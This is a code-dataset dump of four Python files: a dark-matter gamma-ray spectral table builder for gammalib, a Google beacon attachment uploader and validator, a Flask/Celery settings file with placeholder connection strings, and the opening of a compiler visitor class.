id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
283611 | import gammalib
import math
import numpy as np
from ctadmtool.dmspectrum.dmspectra import dmspectrum
from ctadmtool.tools.misc import ValidValue , ValidString
from tqdm import tqdm
import warnings
ALLOWED_FERMIONS = ('Majorana', 'Dirac')
ALLOWED_CHANNELS = ('eL', 'eR', 'e',
'MuL', 'MuR', 'Mu', 'TauL', 'TauR', 'Tau',
'q', 'c', 'b', 't',
'WL', 'WT', 'W', 'ZL', 'ZT', 'Z', 'g', 'Gamma', 'h',
'Nue', 'NuMu', 'NuTau',
'Ve', 'VMu', 'VTau')
ALLOWED_CHANNELSNOEW = ('e','Mu','Tau','q','c','b','t','W','Z','g')
@ValidValue("_dfactor", min_val=1.e-40)
@ValidValue('_lifetime', min_val=1.e-40)
@ValidValue("_jfactor", min_val=1.e-40)
@ValidValue('_sigmav', min_val=1.e-40)
@ValidString('_delta', empty_allowed=False, options=ALLOWED_FERMIONS)
@ValidValue('_mmin', min_val=10.0)
@ValidValue('_mmax', max_val=1.e+5)
@ValidString('_srcname', empty_allowed=False)
class dmtable() :
"""
Class to compute the flux generated
from annihilation of dark matter
particles.
dmflux is a derived class from dmspectrum.
"""
# Init
def __init__(self, srcname, mmin, mmax, mpoints, dminterp, delta='Majorana',
sigmav=3.6e-26, jfactor=1.e+19, lifetime=1.e+30, dfactor=1.e+19) :
"""
Initialize the dmflux_anna class
Parameters:
----------
srcname : Name of the target or family targets
mmin : Min Mass of dark matter candidate
mmax : Max Mass of dark matter candidate
mpoints : Number of mass points to create the Fits table
dminterp : dmspectrum class instance (I avoid to write a lot
of code I already have)
delta : Parameter to describe if dark matter candidate
is a Majorana (delta=2) fermion or a
Dirac (delta=4) fermion
sigmav : Annihilation cross-section (in cm**3/s)
jfactor : Astrophysical factor in (GeV**2/cm**5)
lifetime : Decay lifetime (in s)
dfactor : Astrophysical factor in (GeV/cm**2)
"""
# And, I check that mmin < mmax, if not, then reverse the order
if mmin > mmax :
msg = ('\nI found that Minimum mass {0} '.format(mmin) +
'is greater than Maximum mass {0}.\n'.format(mmax) +
'Changing the order...')
warnings.warn(msg, RuntimeWarning)
m_min = mmax
m_max = mmin
else :
m_min = mmin
m_max = mmax
# Initialize parameters of dmflux_ana class
self._srcname = srcname
self._sigmav = sigmav
self._jfactor = jfactor
self._lifetime = lifetime
self._dfactor = dfactor
self._delta = delta
self._mmin = m_min
self._mmax = m_max
self._mpoints = mpoints
if not isinstance(dminterp, dmspectrum) :
msg = 'dminterp must be an instance of dmspectrum class'
raise TypeError(msg)
else :
self._dminterp = dminterp
self._masses = self._marray(m_min, m_max, mpoints)
if dminterp.hasEW :
self._allowed_channels = ALLOWED_CHANNELS
else :
self._allowed_channels = ALLOWED_CHANNELSNOEW
self._model = None
# Return
return
@property
def sigmav(self) :
"""
Return value of the annihilation cross-section
used to compute the flux
"""
# Return
return self._sigmav
@sigmav.setter
def sigmav(self, sigmav) :
"""
Set the value of Annihilation cross-section (in cm**3/s)
used to compute the flux
Parameters
----------
sigmav : Annihilation cross-section (cm**3/s)
"""
# Check that sigmav is greater than 1.e-35
if sigmav < 1.e-40 :
raise ValueError(('\nValue of annihilation cross-section ' +
' must be greater than 1.e-40.\n' +
'This is just to avoid possible round errors'))
# Set sigmav
self._sigmav = sigmav
# Return
return
@property
def lifetime(self) :
"""
Return value of the decay lifetime
used to compute the flux
"""
# Return
return self._lifetime
@lifetime.setter
def lifetime(self, tau_chi) :
"""
Set the value of decay lifetime (in s)
used to compute the flux
Parameters
----------
tau_chi : Annihilation cross-section (cm**3/s)
"""
# Check that sigmav is greater than 1.e-35
if tau_chi < 1.e-40 :
raise ValueError(('\nValue of decay lifetime ' +
' must be greater than 1.e-40.\n' +
'This is just to avoid possible round errors'))
# Set sigmav
self._lifetime = tau_chi
# Return
return
@property
def jfactor(self) :
"""
Return the value of the Astrophysical factor
used to compute the flux
"""
# Return
return self._jfactor
@jfactor.setter
def jfactor(self, jfactor) :
"""
Set the value of the Astrophysical factor (GeV**2/cm**5)
to compute the dm flux
Parameters
----------
jfactor : Astrophysical factor J (GeV**2/cm**5)
"""
if jfactor < 1.e-40 :
raise ValueError('\nValue of jfactor must be greater than 1.e-40.')
# Set the jfactor
self._jfactor = jfactor
# Return
return
@property
def dfactor(self) :
"""
Return the value of the Astrophysical factor
used to compute the flux
"""
# Return
return self._dfactor
@dfactor.setter
def dfactor(self, dfactor) :
"""
Set the value of the Astrophysical factor (GeV/cm**2)
to compute the dm flux
Parameters
----------
dfactor : Astrophysical factor D (GeV/cm**2)
"""
# Set the jfactor
self._dfactor = dfactor
# Return
return
@property
def mmin(self) :
"""
Return Minimum value mass (GeV) used to compute
the dm flux
"""
# Return
return self._mmin
@mmin.setter
def mmin(self, m_min) :
"""
Set the value of minimum mass (GeV) used to compute
the dm flux
"""
# Just check that the minimum mass is greater than
# 10.0 GeV.
if m_min < 10. :
raise ValueError(('\nMinimum mass {0} GeV '.format(m_min) +
'is below the allowed value (10GeV)'))
# Set minimum energy
self._mmin = m_min
# Update masses
mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
self._masses = mvalues
# Return
return
@property
def mmax(self) :
"""
Return Maximum value of mass (GeV) used to compute
the dm flux
"""
# Return
return self._mmax
@mmax.setter
def mmax(self, m_max) :
"""
Set the value of minimum mass (GeV) used to compute
the dm flux
"""
if m_max > 1.e+5 :
raise ValueError(('\nMaximum mass {0} GeV '.format(m_max) +
'is above the allowed value (1.e+5GeV)'))
# Set minimum energy
self._mmax = m_max
# Update masses
mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
self._masses = mvalues
# Return
return
@property
def masses(self) :
"""
Return the values of the energy array used to compute the spectrum
"""
# Return
return self._masses
@masses.setter
def masses(self, m_vals) :
"""
Set the masses used to compute the spectrum
Parameters
----------
- evals : tuple with:
- mmin : Minimum mass (GeV)
- mmax : Maximum mass (GeV)
- mpoints : Number of points to create the array
"""
mmin, mmax, mpoints = m_vals
# Check if emin and emax are valid
if mmin < 10.0 :
raise ValueError(('Mass {0} '.format(mmin) +
'is lower than the allowed value 10.0'))
if mmax > 1.e+5 :
raise ValueError(('Mass {0} '.format(mmax) +
'is greater than the allowed value 1.e+5'))
# Create energy array
mvalues = self._marray(mmin, mmax, mpoints)
self._masses = mvalues
# Return
return
@staticmethod
def _marray(mmin, mmax, mpoints) :
"""
Create list of masses to generate the fits table.
The calculation is based in the number of points
The masses are computed assuming logarithmic distance
"""
logmmin = np.log10(mmin)
logmmax = np.log10(mmax)
width = (logmmax - logmmin)/(mpoints-1)
masses = []
for index in range(mpoints) :
masses.append(math.pow(10., logmmin+index*width))
# Return
return masses
@property
def delta(self) :
"""
Return what kind of dark matter particle is
used to compute the dm flux
"""
# Return
return self._delta
@delta.setter
def delta(self, delta) :
"""
Set the value of delta to describe what kind of
dark matter particle is used to compute the
dm flux.
Parameters
----------
delta : String, either Majorana or Dirac
"""
# Just to check that delta is valid
if delta not in ALLOWED_FERMIONS :
raise ValueError(('\nKind of Dark matter particle not ' +
'supported.\nOptions are:{0}'.format(ALLOWED_FERMIONS)))
# Set minimum energy
self._delta = delta
# Return
return
@property
def hasEW(self) :
"""
Return whether EW corrections are included or not
"""
# Return
return self._dminterp.hasEW
@hasEW.setter
def hasEW(self, has_EW) :
"""
Include EW corrections in computation of DM spectra
"""
self._dminterp.hasEW = has_EW
# Update the tuple of allowed channels
if has_EW :
self._allowed_channels = ALLOWED_CHANNELS
else :
self._allowed_channels = ALLOWED_CHANNELSNOEW
# Return
return
@property
def allowed_channels(self) :
"""
Return tuple of allowed channels according to
whether or not to include EW corrections in spectra
"""
# Return
return self._allowed_channels
@property
def tablemodel(self) :
"""
Return GModelSpectralTable
"""
# Return
return self._model
@property
def process(self) :
"""
Return dm process
"""
# Return
return self._dminterp.process
@process.setter
def process(self, process_vals) :
"""
Set annihilation (anna) or decay process in dminterp
Also update the properties jfactor and sigmav for anna
or dfactor and lifetime for decay
"""
# Extract values
dmprocess = process_vals[0]
astfactor = process_vals[1]
paroi = process_vals[2]
# Check that process is valid
VALID_PROCESSES = ['anna', 'decay']
if dmprocess not in VALID_PROCESSES :
msg = 'Valid options are: {0}'.format(VALID_PROCESSES)
raise ValueError(msg)
if astfactor < 1.e-40 or paroi < 1.e-40 :
raise ValueError('\nParameters must be greater than 1.e-40.')
# Update properties
if dmprocess == 'anna' :
self._jfactor = astfactor
self._sigmav = paroi
elif dmprocess == 'decay' :
self._dfactor = astfactor
self._lifetime = paroi
self._dminterp.process = dmprocess
# Update
# Return
return
@property
def elist(self) :
"""
Return list of energy values used to compute the spectrum
"""
# Return
return self._dminterp.energy
@elist.setter
def elist(self, evals) :
"""
Update energy values used to compute the spectrum
evals[0] --> emin
evals[1] --> emax
evals[2] --> epoints
"""
# Check that emin and emax are ok
# Note, that I set the minimum to 500 MeV
# There is no meaning to go to lower energies
# In the case of CTA
if evals[0] < 5.0e-3 or evals[1] > 1.e+5 :
raise ValueError('\nParameters outside of range')
# Update properties
self._dminterp.energy = evals
# Return
return
@staticmethod
def _norm_anna(sigmav, mass, delta, jfactor) :
"""
Compute normalization of the dm flux compatible with gammalib
Parameters
----------
sigmav : Value of annihilation cross-section (cm**3/s)
mass : Mass of dark matter particles (GeV)
delta : String to indicate if dark matter is a
Majorana or Dirac fermion
jfactor : Astrophysica factor for annihilation
Return
------
norm : (1/[MeV* cm^2 * s])
"""
d = 0.
# Check delta
if delta == 'Majorana' :
d = 2.
elif delta == 'Dirac' :
d = 4.
# Compute ppfactor
ppfactor = sigmav / (d*4.*gammalib.pi*mass*mass)
norm = ppfactor * jfactor
return norm * 1.0e-3
@staticmethod
def _norm_decay(lifetime, mass, dfactor) :
"""
Compute normalization of the dm flux compatible with gammalib
Parameters
----------
lifetime : Value of decay lifetime (s)
mass : Mass of dark matter particles (GeV)
dfactor : Astrophysical factor for ecay
Return
------
norm : (1/[MeV* cm^2 * s])
"""
# Compute ppfactor
ppfactor = 1 / (4.*gammalib.pi*mass*lifetime)
norm = ppfactor * dfactor
return norm * 1.0e-3
def create_modeltable(self) :
"""
Create fits table with spectrum and channels
"""
# Get list of channel indices
# First, I get the number of channels and energy points
# I don't want to access a private member from dmspectrum
# class, but I can get the number of points from the
# energy array
ch_indices = [i for i in range(len(self._allowed_channels))]
n_chs = len(ch_indices)
n_eng = len(self._dminterp.energy)
# Array with definitions of energy bins
gemin = gammalib.GEnergy(self._dminterp.emin, 'GeV')
gemax = gammalib.GEnergy(self._dminterp.emax, 'GeV')
ebins = gammalib.GEbounds(n_eng, gemin, gemax)
# Then create the GModelPar objects for mass and channel
# I know, default channel is hard coded, but we don't need
# to select any particular channel at this moment.
# Select Tau channel is just for initialization
dmmass = gammalib.GModelPar('Mass', self._mmin, 1.0)
dmmass.unit('GeV')
index = self._allowed_channels.index('Tau')
dmchannel = gammalib.GModelPar('Channel', index, 1.0)
# Create the GSpectralTablePar objects
par_mass = gammalib.GModelSpectralTablePar(dmmass, self._masses)
par_channel = gammalib.GModelSpectralTablePar(dmchannel, ch_indices)
# Create the container GSpectralTablePars and append the pars
pars = gammalib.GModelSpectralTablePars()
pars.append(par_mass)
pars.append(par_channel)
# GNdarray to save the spectra
spectra = gammalib.GNdarray(self._mpoints,n_chs,n_eng)
# filling the spectrum
desc = 'Computing {}-spectrrum'.format(self._dminterp.process)
for index, mass in tqdm(enumerate(self._masses),desc=desc,leave=False):
# Change the value of the mass
self._dminterp.mass = mass
for cindex, thisch in enumerate(self._allowed_channels):
# Modified the instance of dmspectrum
# to match values for every channel
# I don't need to change the array for energy
# And also, I don't need to check whether I want
# to include EW corrections or not
self._dminterp.channel = thisch
dmspec = self._dminterp.spectra()
for eindex in range(n_eng):
spectra[index, cindex, eindex] = dmspec[eindex]
# Get ppfactor and normalization
# This normalization computed here
# is not neccessary. You can change the normalization
# of the GModelSpectralTable later during simulation
# or analysis steps via GModelSpectralTable methods
norm = 0.0
minval = 0.0
maxval = 1.0e+20
if self._dminterp.process == 'anna' :
norm = self._norm_anna(self._sigmav, self._mmin,
self._delta, self._jfactor)
elif self._dminterp.process == 'decay' :
norm = self._norm_decay(self._lifetime, self._mmin, self._dfactor)
# Tuning the ModelSpectralTable
# I set the interpolation method of masses to logarithmic
# Mass and channel are fixed.
# Particularly, it's mandatory that channel parameter is fixed
model = gammalib.GModelSpectralTable(ebins, pars, spectra)
model.table_par('Mass').method(1)
model.table_par('Channel').method(0)
model['Mass'].fix()
model['Channel'].fix()
model['Normalization'].value(norm)
model['Normalization'].scale(1.0)
model['Normalization'].range(minval, maxval)
self._model = model
# Return
return
def save(self) :
"""
Save the DM table
"""
process = self._dminterp.process
ew = int(self._dminterp.hasEW)
name = 'DMModel{0}{1}EW{2}.fits'.format(process, self._srcname, ew)
self._model.save(name, True)
return
@ValidValue("_dfactor", min_val=1.e-40)
@ValidValue('_lifetime', min_val=1.e-40)
@ValidValue("_jfactor", min_val=1.e-40)
@ValidValue('_sigmav', min_val=1.e-40)
@ValidString('_delta', empty_allowed=False, options=ALLOWED_FERMIONS)
@ValidValue('_mmin', min_val=10.0)
@ValidValue('_mmax', max_val=1.e+5)
@ValidString('_srcname', empty_allowed=False)
class dmtable_ch() :
"""
Class to compute the flux generated
from annihilation of dark matter
particles.
dmflux is a derived class from dmspectrum.
the suffix 'ch' stands for single channel,
so the class only create table-models for
specific channels
"""
# Init
def __init__(self, srcname, mmin, mmax, mpoints, dminterp,
channel='Tau', delta='Majorana', sigmav=3.6e-26, jfactor=1.e+19,
lifetime=1.e+30, dfactor=1.e+19) :
"""
Initialize the dmflux_anna class
Parameters:
----------
srcname : Name of the target or family targets
mmin : Min Mass of dark matter candidate
mmax : Max Mass of dark matter candidate
mpoints : Number of mass points to create the Fits table
dminterp : dmspectrum class instance (I avoid to write a lot
of code I already have)
delta : Parameter to describe if dark matter candidate
is a Majorana (delta=2) fermion or a
Dirac (delta=4) fermion
sigmav : Annihilation cross-section (in cm**3/s)
jfactor : Astrophysical factor in (GeV**2/cm**5)
lifetime : Decay lifetime (in s)
dfactor : Astrophysical factor in (GeV/cm**2)
"""
# And, I check that mmin < mmax, if not, then reverse the order
if mmin > mmax :
msg = ('\nI found that Minimum mass {0} '.format(mmin) +
'is greater than Maximum mass {0}.\n'.format(mmax) +
'Changing the order...')
warnings.warn(msg, RuntimeWarning)
m_min = mmax
m_max = mmin
else :
m_min = mmin
m_max = mmax
# Initialize parameters of dmflux_ana class
self._srcname = srcname
self._sigmav = sigmav
self._jfactor = jfactor
self._lifetime = lifetime
self._dfactor = dfactor
self._delta = delta
self._mmin = m_min
self._mmax = m_max
self._mpoints = mpoints
self._channel = channel
if not isinstance(dminterp, dmspectrum) :
msg = 'dminterp must be an instance of dmspectrum class'
raise TypeError(msg)
else :
self._dminterp = dminterp
self._masses = self._marray(m_min, m_max, mpoints)
if dminterp.hasEW :
self._allowed_channels = ALLOWED_CHANNELS
else :
self._allowed_channels = ALLOWED_CHANNELSNOEW
# Check if channel is valid
if channel not in self._allowed_channels:
msg = ('\nChannel {0} not found in'.format(channel) +
'allowed channels. Options are: {0}'.format(ALLOWED_FERMIONS))
raise ValueError(msg)
# Update channel property of spectrum interpolator dminterp
# Only if the channels are different
if dminterp.channel != channel :
dminterp.channel = channel
self._model = None
# Return
return
@property
def sigmav(self) :
"""
Return value of the annihilation cross-section
used to compute the flux
"""
# Return
return self._sigmav
@sigmav.setter
def sigmav(self, sigmav) :
"""
Set the value of Annihilation cross-section (in cm**3/s)
used to compute the flux
Parameters
----------
sigmav : Annihilation cross-section (cm**3/s)
"""
# Check that sigmav is greater than 1.e-35
if sigmav < 1.e-40 :
raise ValueError(('\nValue of annihilation cross-section ' +
' must be greater than 1.e-40.\n' +
'This is just to avoid possible round errors'))
# Set sigmav
self._sigmav = sigmav
# Return
return
@property
def lifetime(self) :
"""
Return value of the decay lifetime
used to compute the flux
"""
# Return
return self._lifetime
@lifetime.setter
def lifetime(self, tau_chi) :
"""
Set the value of decay lifetime (in s)
used to compute the flux
Parameters
----------
tau_chi : Annihilation cross-section (cm**3/s)
"""
# Check that sigmav is greater than 1.e-35
if tau_chi < 1.e-40 :
raise ValueError(('\nValue of decay lifetime ' +
' must be greater than 1.e-40.\n' +
'This is just to avoid possible round errors'))
# Set sigmav
self._lifetime = tau_chi
# Return
return
@property
def jfactor(self) :
"""
Return the value of the Astrophysical factor
used to compute the flux
"""
# Return
return self._jfactor
@jfactor.setter
def jfactor(self, jfactor) :
"""
Set the value of the Astrophysical factor (GeV**2/cm**5)
to compute the dm flux
Parameters
----------
jfactor : Astrophysical factor J (GeV**2/cm**5)
"""
if jfactor < 1.e-40 :
raise ValueError('\nValue of jfactor must be greater than 1.e-40.')
# Set the jfactor
self._jfactor = jfactor
# Return
return
@property
def dfactor(self) :
"""
Return the value of the Astrophysical factor
used to compute the flux
"""
# Return
return self._dfactor
@dfactor.setter
def dfactor(self, dfactor) :
"""
Set the value of the Astrophysical factor (GeV/cm**2)
to compute the dm flux
Parameters
----------
dfactor : Astrophysical factor D (GeV/cm**2)
"""
# Set the jfactor
self._dfactor = dfactor
# Return
return
@property
def mmin(self) :
"""
Return Minimum value mass (GeV) used to compute
the dm flux
"""
# Return
return self._mmin
@mmin.setter
def mmin(self, m_min) :
"""
Set the value of minimum mass (GeV) used to compute
the dm flux
"""
# Just check that the minimum mass is greater than
# 10.0 GeV.
if m_min < 10. :
raise ValueError(('\nMinimum mass {0} GeV '.format(m_min) +
'is below the allowed value (10GeV)'))
# Set minimum energy
self._mmin = m_min
# Update masses
mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
self._masses = mvalues
# Return
return
@property
def mmax(self) :
"""
Return Maximum value of mass (GeV) used to compute
the dm flux
"""
# Return
return self._mmax
@mmax.setter
def mmax(self, m_max) :
"""
Set the value of minimum mass (GeV) used to compute
the dm flux
"""
if m_max > 1.e+5 :
raise ValueError(('\nMaximum mass {0} GeV '.format(m_max) +
'is above the allowed value (1.e+5GeV)'))
# Set minimum energy
self._mmax = m_max
# Update masses
mvalues = self._marray(self._mmin, self._mmax, self._mpoints)
self._masses = mvalues
# Return
return
@property
def masses(self) :
"""
Return the values of the energy array used to compute the spectrum
"""
# Return
return self._masses
@masses.setter
def masses(self, m_vals) :
"""
Set the masses used to compute the spectrum
Parameters
----------
- evals : tuple with:
- mmin : Minimum mass (GeV)
- mmax : Maximum mass (GeV)
- mpoints : Number of points to create the array
"""
mmin, mmax, mpoints = m_vals
# Check if emin and emax are valid
if mmin < 10.0 :
raise ValueError(('Mass {0} '.format(mmin) +
'is lower than the allowed value 10.0'))
if mmax > 1.e+5 :
raise ValueError(('Mass {0} '.format(mmax) +
'is greater than the allowed value 1.e+5'))
# Create energy array
mvalues = self._marray(mmin, mmax, mpoints)
self._masses = mvalues
# Return
return
@staticmethod
def _marray(mmin, mmax, mpoints) :
"""
Create list of masses to generate the fits table.
The calculation is based in the number of points
The masses are computed assuming logarithmic distance
"""
logmmin = np.log10(mmin)
logmmax = np.log10(mmax)
width = (logmmax - logmmin)/(mpoints-1)
masses = []
for index in range(mpoints) :
masses.append(math.pow(10., logmmin+index*width))
# Return
return masses
@property
def delta(self) :
"""
Return what kind of dark matter particle is
used to compute the dm flux
"""
# Return
return self._delta
@delta.setter
def delta(self, delta) :
"""
Set the value of delta to describe what kind of
dark matter particle is used to compute the
dm flux.
Parameters
----------
delta : String, either Majorana or Dirac
"""
# Just to check that delta is valid
if delta not in ALLOWED_FERMIONS :
raise ValueError(('\nKind of Dark matter particle not ' +
'supported.\nOptions are:{0}'.format(ALLOWED_FERMIONS)))
# Set minimum energy
self._delta = delta
# Return
return
@property
def hasEW(self) :
"""
Return whether EW corrections are included or not
"""
# Return
return self._dminterp.hasEW
@hasEW.setter
def hasEW(self, has_EW) :
"""
Include EW corrections in computation of DM spectra
"""
self._dminterp.hasEW = has_EW
# Update the tuple of allowed channels
if has_EW :
self._allowed_channels = ALLOWED_CHANNELS
else :
self._allowed_channels = ALLOWED_CHANNELSNOEW
# Return
return
@property
def allowed_channels(self) :
"""
Return tuple of allowed channels according to
whether or not to include EW corrections in spectra
"""
# Return
return self._allowed_channels
@property
def channel(self) :
'''
Return channel used to compute the gamma-ray flux
'''
# Return
return self._channel
@channel.setter
def channel(self, ch) :
'''
Set channel used to compute the dmspectrum.
Also updates the channel parameter of the
spectrum interpolator dminterp
If channel is not valid, raise value error
'''
# Check if channel is valid
if ch not in self._allowed_channels :
msg = ('\nChannel {0} not found in'.format(channel) +
'allowed channels. Options are: {0}'.format(ALLOWED_FERMIONS))
raise ValueError(msg)
# Set channel
self._channel = ch
# Update dminterp instance
self._dminterp.channel = ch
# Return
return
@property
def tablemodel(self) :
"""
Return GModelSpectralTable
"""
# Return
return self._model
@property
def process(self) :
"""
Return dm process
"""
# Return
return self._dminterp.process
@process.setter
def process(self, process_vals) :
"""
Set annihilation (anna) or decay process in dminterp
Also update the properties jfactor and sigmav for anna
or dfactor and lifetime for decay
"""
# Extract values
dmprocess = process_vals[0]
astfactor = process_vals[1]
paroi = process_vals[2]
# Check that process is valid
VALID_PROCESSES = ['anna', 'decay']
if dmprocess not in VALID_PROCESSES :
msg = 'Valid options are: {0}'.format(VALID_PROCESSES)
raise ValueError(msg)
if astfactor < 1.e-40 or paroi < 1.e-40 :
raise ValueError('\nParameters must be greater than 1.e-40.')
# Update properties
if dmprocess == 'anna' :
self._jfactor = astfactor
self._sigmav = paroi
elif dmprocess == 'decay' :
self._dfactor = astfactor
self._lifetime = paroi
self._dminterp.process = dmprocess
# Update
# Return
return
@property
def elist(self) :
"""
Return list of energy values used to compute the spectrum
"""
# Return
return self._dminterp.energy
@elist.setter
def elist(self, evals) :
"""
Update energy values used to compute the spectrum
evals[0] --> emin
evals[1] --> emax
evals[2] --> epoints
"""
# Check that emin and emax are ok
# I set the minimum to 500 MeV
if evals[0] < 5.0e-3 or evals[1] > 1.e+5 :
raise ValueError('\nParameters outside of range')
# Update properties
self._dminterp.energy = evals
# Return
return
@staticmethod
def _norm_anna(sigmav, mass, delta, jfactor) :
"""
Compute normalization of the dm flux compatible with gammalib
Parameters
----------
sigmav : Value of annihilation cross-section (cm**3/s)
mass : Mass of dark matter particles (GeV)
delta : String to indicate if dark matter is a
Majorana or Dirac fermion
jfactor : Astrophysica factor for annihilation
Return
------
norm : (1/[MeV* cm^2 * s])
"""
d = 0.
# Check delta
if delta == 'Majorana' :
d = 2.
elif delta == 'Dirac' :
d = 4.
# Compute ppfactor
ppfactor = sigmav / (d*4.*gammalib.pi*mass*mass)
norm = ppfactor * jfactor
return norm * 1.0e-3
@staticmethod
def _norm_decay(lifetime, mass, dfactor) :
"""
Compute normalization of the dm flux compatible with gammalib
Parameters
----------
lifetime : Value of decay lifetime (s)
mass : Mass of dark matter particles (GeV)
dfactor : Astrophysical factor for ecay
Return
------
norm : (1/[MeV* cm^2 * s])
"""
# Compute ppfactor
ppfactor = 1 / (4.*gammalib.pi*mass*lifetime)
norm = ppfactor * dfactor
return norm * 1.0e-3
def create_modeltable(self) :
"""
Create fits table with spectrum for specific channel
"""
# Number of points in energy array
n_eng = len(self._dminterp.energy)
# Array with definitions of energy bins
# The min and max values are encapsulated in the
# dm spectrum interpolator dminterp
gemin = gammalib.GEnergy(self._dminterp.emin, 'GeV')
gemax = gammalib.GEnergy(self._dminterp.emax, 'GeV')
ebins = gammalib.GEbounds(n_eng, gemin, gemax)
# Then create the GModelPar objects for mass
dmmass = gammalib.GModelPar('Mass', self._mmin, 1.0)
dmmass.unit('GeV')
# Create the GSpectralTablePar objects
par_mass = gammalib.GModelSpectralTablePar(dmmass, self._masses)
# Create the container GSpectralTablePars and append the pars
pars = gammalib.GModelSpectralTablePars()
pars.append(par_mass)
# GNdarray to save the spectra
spectra = gammalib.GNdarray(self._mpoints,n_eng)
# filling the spectrum
desc = 'Computing {}-spectrrum'.format(self._dminterp.process)
for index, mass in tqdm(enumerate(self._masses),desc=desc,leave=False):
# Change the value of the mass
self._dminterp.mass = mass
dmspec = self._dminterp.spectra()
for eindex in range(n_eng):
spectra[index, eindex] = dmspec[eindex]
# Get ppfactor and normalization
# This normalization computed here
# is not neccessary. You can change the normalization
# of the GModelSpectralTable later during simulation
# or analysis steps via GModelSpectralTable methods
norm = 0.0
minval = 0.0
maxval = 1.0e+20
if self._dminterp.process == 'anna' :
norm = self._norm_anna(self._sigmav, self._mmin,
self._delta, self._jfactor)
elif self._dminterp.process == 'decay' :
norm = self._norm_decay(self._lifetime, self._mmin, self._dfactor)
# Tuning the ModelSpectralTable
# I set the interpolation method of masses to logarithmic
# Mass is a fixed parameter
model = gammalib.GModelSpectralTable(ebins, pars, spectra)
model.table_par('Mass').method(1)
model['Mass'].scale(1.)
model['Mass'].fix()
model['Normalization'].value(norm)
model['Normalization'].scale(1.0)
model['Normalization'].range(minval, maxval)
self._model = model
# Return
return
def save(self) :
"""
Save the DM table
"""
process = self._dminterp.process
ew = int(self._dminterp.hasEW)
src = self._srcname
ch = self._channel
name = 'DMModel{0}{1}EW{2}Ch{3}.fits'.format(process, src, ew, ch)
self._model.save(name, True)
return
| StarcoderdataPython |
1793757 | #!/usr/bin/env python
# Copyright (C) 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import argparse
import json
import pbapi
REQUIRED_FIELDS = [
'url',
'title',
'description'
]
RECOMMENDED_FIELDS = [
]
NEARBY_NS_TYPE = 'com.google.nearby/en'
IDEAL_TITLE_DESC_MAX = 40
HARD_TITLE_DESC_MAX = 50
def main():
parser = argparse.ArgumentParser(description=
'Creates and adds an attachment to a beacon and verifies it to be a valid Nearby Notifications attachment')
parser.add_argument('creds',
help='Path to JSON file containing service account credentials authorized to call the Google Proximity Beacon API')
parser.add_argument('beacon_name',
help='Name of the beacon to attach to. Format is "beacons/N!<beacon ID>"')
parser.add_argument('attachment',
help='Path to the JSON file of the attachment to add (data only)')
args = parser.parse_args()
creds = args.creds
pb_client = pbapi.build_client_from_json(creds)
print('Checking that "{}" is registered with current project'
.format(args.beacon_name))
beacons = pb_client.list_beacons()
beacon_names = map(lambda b: b['beaconName'], beacons)
if args.beacon_name not in beacon_names:
print('Beacon name {} not registered yet. Please register it first.'
.format(args.beacon_name))
exit(1)
attachment_file = args.attachment
print('Reading attachment from "{}" and verifying fields'
.format(attachment_file))
with open(args.attachment, 'r') as data_file:
attachment = json.load(data_file)
print('Checking attachment for required fields.')
for field in REQUIRED_FIELDS:
if field not in attachment:
print('[ERROR] Nearby requires "{}" field in attachment json, but was not found.'
.format(field))
exit(1)
print('Checking attachment for recommended fields.')
for field in RECOMMENDED_FIELDS:
if field not in attachment:
print('[WARN] "{}" is recommended to have in a Nearby attachment, but was not found.'
.format(field))
print('Checking title + description length')
title_desc_len = 0
if 'title' in attachment:
title_desc_len += len(attachment['title'])
if 'description' in attachment:
title_desc_len += len(attachment['description'])
if title_desc_len > HARD_TITLE_DESC_MAX:
print('[ERROR] Title + Description length surpassed hard max of {}. Values given: "{} - {}" (length: {})'
.format(HARD_TITLE_DESC_MAX, attachment['title'], attachment['description'], title_desc_len))
exit(1)
if title_desc_len > IDEAL_TITLE_DESC_MAX:
print('[WARN] Title + Description length greater than soft max of {}. Values given: "{} - {}" (length: {})'
.format(IDEAL_TITLE_DESC_MAX, attachment['title'], attachment['description'], title_desc_len))
# Add attachment to beacon
print('Adding attachment to "' + args.beacon_name + '"')
pb_client.add_attachment(args.beacon_name, NEARBY_NS_TYPE, json.dumps(attachment))
if __name__ == "__main__":
main()
| StarcoderdataPython |
9641979 | #-------------------------------------------------------------------------------
# Name: settings.py
# Purpose:
#
# Author: <NAME>. - <EMAIL>
#
# Created: 08/07/2021
# Copyright: (c) <NAME>. 2021 [ACAI Engineering ia]
# Licence: MIT
#-------------------------------------------------------------------------------
class BaseConfig():
API_PREFIX = '/api'
TESTING = False
DEBUG = False
class DevConfig(BaseConfig):
FLASK_ENV = 'development'
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgresql://db_user:db_password@db-postgres:5432/flask-deploy'
CELERY_BROKER = 'pyamqp://rabbit_user:rabbit_password@broker-rabbitmq//'
CELERY_RESULT_BACKEND = 'rpc://rabbit_user:rabbit_password@broker-rabbitmq//'
class ProductionConfig(BaseConfig):
FLASK_ENV = 'production'
DEBUG = True
SQLALCHEMY_DATABASE_URI = 'postgresql://db_user:db_password@db-postgres:5432/flask-deploy'
CELERY_BROKER = 'pyamqp://rabbit_user:rabbit_password@broker-rabbitmq//'
CELERY_RESULT_BACKEND = 'rpc://rabbit_user:rabbit_password@broker-rabbitmq//'
class TestConfig(BaseConfig):
FLASK_ENV = 'development'
TESTING = True
DEBUG = True
# make celery execute tasks synchronously in the same process
CELERY_ALWAYS_EAGER = True
| StarcoderdataPython |
1912984 | from .symbol_table import SymbolTable
from ..visitor import symbols
class Visitor:
vocab_bases = {
"Compiler": "Compil",
"Interpreter": "Interpret",
"Transpiler": "Transpil"
}
def __init__(self, visitor_type, output_stream):
self.type = visitor_type
self.headers = set()
self.output_stream = output_stream
self.symbol_table = SymbolTable()
self.symbol_table.interpret = visitor_type == "Interpreter"
self.add_global_vars()
self.depth = 0
self.break_depth = 0
def add_global_vars(self):
self.symbol_table["null"] = symbols.Constant("null", 0)
